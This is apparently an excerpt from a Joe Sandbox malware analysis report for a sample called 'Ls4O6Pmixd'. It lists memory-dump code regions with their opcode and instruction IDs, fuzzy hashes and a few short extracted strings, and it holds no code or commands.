                                                                                            • Instruction Fuzzy Hash: 7691E3B2A1AA468FF6A4DB18C4459BA73D2EFD4300F044579E44EC7296EE31EC4587C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: :j2P
                                                                                            • API String ID: 0-2106166442
                                                                                            • Opcode ID: 5861e7dda319902090c008b143ba9af215735b3b22734ba7b0e9d7f686d54d5a
                                                                                            • Instruction ID: 467c9313d1c7e0f8f80e12938284a72e9b37929562ad3df5d1f10c24441ad550
                                                                                            • Opcode Fuzzy Hash: 5861e7dda319902090c008b143ba9af215735b3b22734ba7b0e9d7f686d54d5a
                                                                                            • Instruction Fuzzy Hash: 4B611361AAD74B4BA31C962C4C4713536DAEB8A204B64D13DF9CFDB296F918E81342C7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 897d0bfc1c0e1e6d116c7f56cb5be1727d171d1802c8fb2ecb7ca5dd4df555aa
                                                                                            • Instruction ID: 221efd7eb52390104b87b130e7393cc7a15fea64f79ef7ffc8e601d1b0025f50
                                                                                            • Opcode Fuzzy Hash: 897d0bfc1c0e1e6d116c7f56cb5be1727d171d1802c8fb2ecb7ca5dd4df555aa
                                                                                            • Instruction Fuzzy Hash: 11B16B3264EA4A8FF795D73C88A55743BD6EF9631070585BAE04DC7292DE38DC0AC391
APIs
Memory Dump Source
• Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: fc7794580372d556f64b50776c18f8e9753087b068659462cb486e764185a06e
• Instruction ID: 5f4072158b76c03411a8bf0da2a9ad1f41d95cb78e4404cab96fc65feda83c1a
• Opcode Fuzzy Hash: fc7794580372d556f64b50776c18f8e9753087b068659462cb486e764185a06e
• Instruction Fuzzy Hash: 5071E570948A8D8FEB58DF6CC8556E43BE1FF59301F10826EE84EC7292DA39D845CB91
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "9
                                                                                            • API String ID: 0-1061052283
                                                                                            • Opcode ID: 12707c92e4336729543c061315686c1353ffbeb3ccbc94f9f0b2786154141ef0
                                                                                            • Instruction ID: 7e7047ec81fe5222a685c5f99a2e281402d558468f22cbe73a6f4156f04ea6bb
                                                                                            • Opcode Fuzzy Hash: 12707c92e4336729543c061315686c1353ffbeb3ccbc94f9f0b2786154141ef0
                                                                                            • Instruction Fuzzy Hash: F4D17470E0564A8FDB09CF9CC5915BEB7F1EF45300B248169E44AFB341DA359E05CBA1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: r6
                                                                                            • API String ID: 0-2984296541
                                                                                            • Opcode ID: b8f6416cadff691bb5a860b348a1b2f0a69864e3c1c5fb56579537aea0460f01
                                                                                            • Instruction ID: 90c5248f13f6b6934cf6066a5c89e9d54f1f59befefd3496d3964342461a9a52
                                                                                            • Opcode Fuzzy Hash: b8f6416cadff691bb5a860b348a1b2f0a69864e3c1c5fb56579537aea0460f01
                                                                                            • Instruction Fuzzy Hash: D3811733A5960A8BFB5CDB5898551B873D7EFC6350F15813EE04E97292EE34B80686C1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0W
                                                                                            • API String ID: 0-1461859783
                                                                                            • Opcode ID: b5e710f4c4d03198845ee9e8ebb290f28f59f323f6a7de56765144007a41fd6d
                                                                                            • Instruction ID: 560529f7ca06702921e8e7e4bdbdb1931e12b5f385335ee1fa337a94e80cab6d
                                                                                            • Opcode Fuzzy Hash: b5e710f4c4d03198845ee9e8ebb290f28f59f323f6a7de56765144007a41fd6d
                                                                                            • Instruction Fuzzy Hash: BD614831B4AB0A8FE79CA77C989527937D6EFDA21174441B9F00ECB392DD24EC468381
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ("\
                                                                                            • API String ID: 0-3175161478
                                                                                            • Opcode ID: d69eb80250e31790f5c35e6c51aa5aaab835412205f10a6308051dd342935359
                                                                                            • Instruction ID: aa25894bdfb9d569a2173d7fc54ff341383bdbc35f451d8b088466f85fef5d52
                                                                                            • Opcode Fuzzy Hash: d69eb80250e31790f5c35e6c51aa5aaab835412205f10a6308051dd342935359
                                                                                            • Instruction Fuzzy Hash: 79418B72758B0B0BA74CD66DACD61B977C6EB99210358427EE50ECB393E851DC0A83C5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ("\
                                                                                            • API String ID: 0-3175161478
                                                                                            • Opcode ID: 5c9933f4ccadf7c1e02878850c4d3a7625aabebce0a093940a5265ae9bddf4d1
                                                                                            • Instruction ID: ad8736bfc68eddfb92a78cf0194288b69828d92d4dd85e8ddf16e464c2d8f61f
                                                                                            • Opcode Fuzzy Hash: 5c9933f4ccadf7c1e02878850c4d3a7625aabebce0a093940a5265ae9bddf4d1
                                                                                            • Instruction Fuzzy Hash: AD417872758B0B0BA74CD99DACC6179B6C6EB98300354827EE50ECB397EC51EC0A83C5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MQ3X
                                                                                            • API String ID: 0-3030361997
                                                                                            • Opcode ID: b0a5c9767c625bb34104c938c19bfd568a28c81f291404e8d93d77c381538c2e
                                                                                            • Instruction ID: 25dcbb7bd632bd4d0b3fe1e327a73ade2726255fe83727e4f56f175cca8db98c
                                                                                            • Opcode Fuzzy Hash: b0a5c9767c625bb34104c938c19bfd568a28c81f291404e8d93d77c381538c2e
                                                                                            • Instruction Fuzzy Hash: 13514D2364D7824FE71E87399C610617BD79FC622031D42BAD49ACF1D7DD38E81A8781
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: MQ3X
                                                                                            • API String ID: 0-3030361997
                                                                                            • Opcode ID: 59bc3337cf87a68648bf4d4c7180c5c1516f84d38707fe570a4dbcc56d7d2066
                                                                                            • Instruction ID: 2c4ba1d0fe1548d24dd9177726f34123088ae67e063e068949dfe267a5004f1b
                                                                                            • Opcode Fuzzy Hash: 59bc3337cf87a68648bf4d4c7180c5c1516f84d38707fe570a4dbcc56d7d2066
                                                                                            • Instruction Fuzzy Hash: 9D3127337545024B671C9A2E9951076B2D7EBD8320329863EE49BDB2C8DE38E85B8685
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37c8e3648e95f84210cbebc4416dadcb592f91653749d37fd3ab721595903973
                                                                                            • Instruction ID: 11fe12bf5cf84a42cdc4bfb3be4233a69ac2acca501d145a24f282b280d100c7
                                                                                            • Opcode Fuzzy Hash: 37c8e3648e95f84210cbebc4416dadcb592f91653749d37fd3ab721595903973
                                                                                            • Instruction Fuzzy Hash: DCA1AC7294E74E4FF3299B6898955B177D8EF92310B1441BDE48FC7683E819E84AC3D0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d7248d16a0ec8976464072b38734a707a3130957d6da144d8952e35bdc4ea1d0
                                                                                            • Instruction ID: af59f975ce496eefe45002dff44a1c398465d3af930c03b07747eb438b4e83d2
                                                                                            • Opcode Fuzzy Hash: d7248d16a0ec8976464072b38734a707a3130957d6da144d8952e35bdc4ea1d0
                                                                                            • Instruction Fuzzy Hash: 67A1792276CB0F4BA32CBDACAC5A17576C6D794210F44823EE84ACB7D2FD54DD0A82C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ff1a0e90a7588b159f659cfeeca6515acb25392829ba29b6eec0598cdc7eef03
                                                                                            • Instruction ID: 2a2f498d2cbf86236ed95b28d920f1430289997ec7651ecf882b174802d40ac3
                                                                                            • Opcode Fuzzy Hash: ff1a0e90a7588b159f659cfeeca6515acb25392829ba29b6eec0598cdc7eef03
                                                                                            • Instruction Fuzzy Hash: 0491AB61BA870E4BA75CBD5C9C6213976C5DB95610F44813EF98BC73D2FE24EC0A82C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0ffa19d9bde540f4a3ea472c6ef83afeb5a55bd5ab0b8b32ffb09e57e42e306e
                                                                                            • Instruction ID: d1da2f7f60773be2feeb86a2ac704acc26e328eaf3fd02e1492d720fdede1878
                                                                                            • Opcode Fuzzy Hash: 0ffa19d9bde540f4a3ea472c6ef83afeb5a55bd5ab0b8b32ffb09e57e42e306e
                                                                                            • Instruction Fuzzy Hash: C2818A62B9874E4BA75CBE6C5C661397BC5DB95210F04413EE58ACB7D2FE14EC0A83C1
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 38916841d7387bbf1462fc2cb275f1dd4a0756e19135231991b2a2f289dda23c
                                                                                            • Instruction ID: 1029c8b6113f0771d69b674de4a0209cba569289f5243d41962afd8718095418
                                                                                            • Opcode Fuzzy Hash: 38916841d7387bbf1462fc2cb275f1dd4a0756e19135231991b2a2f289dda23c
                                                                                            • Instruction Fuzzy Hash: C55137337655064FA30C893DCD56066B6DBABD921031A863EE49BCB3D5EA34E91B8680
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c8bded7c7e9fcf61f640f6cbf60e0a4d0c746cb294fd83c144163a89aae0e550
                                                                                            • Instruction ID: ecf1d6ba7d4e8f4301837e60d060103e3150d81a65782c2d03b77308a59b7bb1
                                                                                            • Opcode Fuzzy Hash: c8bded7c7e9fcf61f640f6cbf60e0a4d0c746cb294fd83c144163a89aae0e550
                                                                                            • Instruction Fuzzy Hash: C55146337645064BA30C893DCD56076B6DBEBC821031A873EE49BDB3D5EE34E91B8680
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ddb364b0db5b35d8af91b1f0e9c191738aff120a914a51e713094021f70c6262
                                                                                            • Instruction ID: 14b1ea95f3b38f4d878b7ccb11d14f7565f4c7664b03f50be23770f6d72a8a86
                                                                                            • Opcode Fuzzy Hash: ddb364b0db5b35d8af91b1f0e9c191738aff120a914a51e713094021f70c6262
                                                                                            • Instruction Fuzzy Hash: B25137337645064BA30C893DCD56076B6DBEBD821035A873EE49BDB3D5EE34E91B8680
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cc92ace9a7319bd89d76d9e7c2740b1bdd868676d2436ff18fa42e80dfbe5bd3
                                                                                            • Instruction ID: 7b8c7b7fcfcc3ecaf9ef2d999aee300f71979d458d471f55141e3cda7d5a99ed
                                                                                            • Opcode Fuzzy Hash: cc92ace9a7319bd89d76d9e7c2740b1bdd868676d2436ff18fa42e80dfbe5bd3
                                                                                            • Instruction Fuzzy Hash: E9419572B198174FEBAC962D886907965CBEFC921039A51B9E00FCBBC4ED24DC0683C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 79a0e4847895a8a7118b11fc45017c1e4ef40cf972e7d65ea6b440d378156235
                                                                                            • Instruction ID: 1e99c63be193ce587f9300c5aa263d80020e5f595c80a55501669b5c7b8a275f
                                                                                            • Opcode Fuzzy Hash: 79a0e4847895a8a7118b11fc45017c1e4ef40cf972e7d65ea6b440d378156235
                                                                                            • Instruction Fuzzy Hash: B141BF22B0D6164FFB6CDA6D88E827962D6EB89211786417EF44ECB3D2D904DC0983C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.1432509865.00007FFAAC520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC520000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_7ffaac520000_Ls4O6Pmixd.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7aaa7319a517cba79eeac11b64cfe8248ef7f4a226b90344bfaf9189139534b9
                                                                                            • Instruction ID: da9714de5bd591e237488f51279c37c5a5bb1d5b49ddd01e1609708a0d3c44aa
                                                                                            • Opcode Fuzzy Hash: 7aaa7319a517cba79eeac11b64cfe8248ef7f4a226b90344bfaf9189139534b9
                                                                                            • Instruction Fuzzy Hash: 70315733B1A81B4FA758DA2D98650BA25C7EFD522172A4139F44FCB398EE34DC578380